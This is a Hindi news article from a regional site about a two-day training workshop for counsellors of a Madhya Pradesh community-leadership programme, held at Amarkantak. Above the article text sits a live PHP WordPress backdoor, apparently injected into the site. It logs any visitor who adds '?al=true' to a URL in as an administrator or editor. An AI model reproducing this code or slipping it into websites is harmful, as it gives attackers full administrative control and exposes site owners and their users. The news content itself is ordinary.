// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); जन अभियान परिषद द्वारा परामर्शदाताओं के दो दिवसीय प्रशिक्षण का हुआ शुभारंभ – प्रत्युषा आशा की नयी किरण
मध्यप्रदेश

जन अभियान परिषद द्वारा परामर्शदाताओं के दो दिवसीय प्रशिक्षण का हुआ शुभारंभ

अनूपपुर
मध्यप्रदेश जन अभियान परिषद एवं महात्मा गांधी ग्रामोदय विश्वविद्यालय चित्रकूट के संयुक्त तत्वाधान में आयोजित मुख्यमंत्री सामुदायिक नेतृत्व क्षमता विकास कार्यक्रम अंतर्गत संचालित बैचलर एवं मास्टर ऑफ सोशल वर्क के शहडोल संभाग के परामर्शदाताओं का आज श्री नर्मदे हर सेवा न्यास अमरकंटक में 02 दिवसीय आवासीय प्रशिक्षण कार्यशाला का शुभारंभ राज्य कोल विकास प्राधिकरण के अध्यक्ष (केबिनेट मंत्री दर्जा) श्री रामलाल रौतेल की अध्यक्षता व माँ नर्मदा मन्दिर के पुजारी श्री धनेश वंदे महराज के मुख्य आतिथ्य में हुआ।

इस अवसर पर जन अभियान परिषद शहडोल के जिला समन्वयक श्री विवेक पाण्डेय, जन अभियान परिषद अनूपपुर के जिला समन्वयक श्री उमेश पाण्डेय, जन अभियान परिषद उमरिया के जिला समन्वयक श्री रविन्द्र शुक्ला, शहडोल संभाग के सभी विकासखंडों से आये सीएमसीएलडीपी के परामर्शदातागण, विकासखंड समन्वयक जन अभियान परिषद, कार्यालयीन स्टाफ उपस्थित रहे।

कार्यशाला में राज्य कोल विकास प्राधिकरण के अध्यक्ष श्री रामलाल रौतेल ने कहा कि मुख्यमंत्री सामुदायिक नेतृत्व क्षमता कार्यक्रम का उददेश्य समाज में सकारात्मकता के भाव के साथ सामाजिक नेतृत्व उत्पन्न करना है। उन्होंने कहा कि आप सभी लोग परिषद के एक वृहद नेटवर्क के साथ कार्य कर रहे है और यह नेटवर्क भविष्य में और भी विस्तार लेगा, तब आपकी भूमिका बेहद महत्वपूर्ण हो जाती है। उन्होने राष्ट्रीय शिक्षा नीति 2020 के विभिन्न पहलुओं पर भी विस्तारपूर्वक चर्चा करते हुये कहा कि शिक्षा नीति विकेन्द्रीकृत होनी चाहिये।

माँ नर्मदा मन्दिर के पुजारी धनेश वंदे महराज द्वारा कहा गया कि आप सभी भाग्यशाली है माँ नर्मदा के आँचल में आप प्रशिक्षण प्राप्त कर रहे है स्थान का बहुत महत्व होता है। प्रशिक्षण में प्रथम सत्र में जिला समन्वयक श्री उमेश पाण्डेय व जिला समन्वयक श्री विवेक पाण्डेय द्वारा मुख्यमंत्री सामुदायिक नेतृत्व क्षमता विकास कार्यक्रम एवं सतत विकास लक्ष्य अवधारणा और उदेश्य के सम्बंध में प्रकाश डाला गया। द्वितीय सत्र में समाजकार्य की अवधारणा एवं व्यवसायिक समाजकार्यकर्ता की भूमिका के सम्बंध में डॉ धर्मेंद्र झरिया सहायक प्राध्यापक इन्दिरा गांधी राष्ट्रीय जनजातीय विश्वविद्यालय अमरकंटक द्वारा लिया गया। तृतीय सत्र पाठ्यक्रम संचनालय की भूमिका के सम्बंध में डॉ विजय फुकन इन्दिरा गांधी राष्ट्रीय जनजातीय विश्वविद्यालय द्वारा प्रबोधन किया गया। चतुर्थ सत्र श्री विकास चन्देल द्वारा विषय संपर्क कक्षा का संचालन की पद्धति व संपर्क कक्षाओ को प्रभावी कैसे बनाए आदि विषय पर लिया गया। कार्यक्रम के अंत मे जिला समन्वयक उमरिया श्री रविन्द्र शुक्ला द्वारा परामर्शदाताओं की जिज्ञासाओं का समाधान किया गया व आभार प्रदर्शन कर प्रथम दिवस के सत्रों का समापन किया गया।

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड